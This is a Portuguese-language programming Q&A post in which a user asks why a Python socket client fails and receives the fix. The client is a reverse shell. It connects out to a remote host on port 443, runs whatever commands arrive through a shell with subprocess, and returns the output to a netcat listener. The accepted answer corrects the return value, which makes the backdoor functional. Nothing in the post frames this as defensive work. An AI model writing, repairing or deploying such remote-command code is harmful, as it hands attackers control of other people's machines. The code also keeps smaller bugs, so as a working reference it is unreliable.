# Problema com socket - recv - python

Tags: python, socket

Olá! É o seguinte, estou com um problema no cliente. Quando utilizo o netcat como servidor, o cliente envia a mensagem "conexão recebida com sucesso" e logo em seguida retorna o seguinte erro:

> Ocorreu exceção: AttributeError
>   module 'socket' has no attribute 'recv'

Código abaixo:

```
# -*- coding: utf-8 -*-
import socket
import time
import subprocess

IP = 'xxx.xxx.xxx.x'
PORTA = 443

def realizando_conexao(ip, porta):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((IP, PORTA))
        crcs = '[!] Conexão recebida com sucesso! [!] \n'
        s.send(crcs.encode())
        return socket    
    except Exception as e:
        print('Erro na conexão: {}'.format(e))
        return None

def cmd(s, data):
    proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    saida = proc.stdout.read() + proc.stderr.read()
    s.send(saida.encode())

def mantendo_conexao(s):
    while True:
        data = s.recv(1024)
        if data[:-1] == '/exit':
            s.close()
            exit(0)
        else:
            cmd(s, data)
def main():

    while True:
        s_conectado = realizando_conexao(IP, PORTA)
        if s_conectado:
            mantendo_conexao(s_conectado)
        else:
            time.sleep(10)

main()
```

Comment: Sua função `realizando_conexao` retorna `socket`. Ela não deveria retornar `s`, que é a conexão?

Comment: Puts, era exatamente isso! hahahah obrigado!

Answer (score 0, accepted):

O problema é que sua função `realizando_conexao()` retorna o módulo `socket` ao invés do *socket* criado anteriormente: a variável `s`.

Basta trocar o `return socket` por `return s`.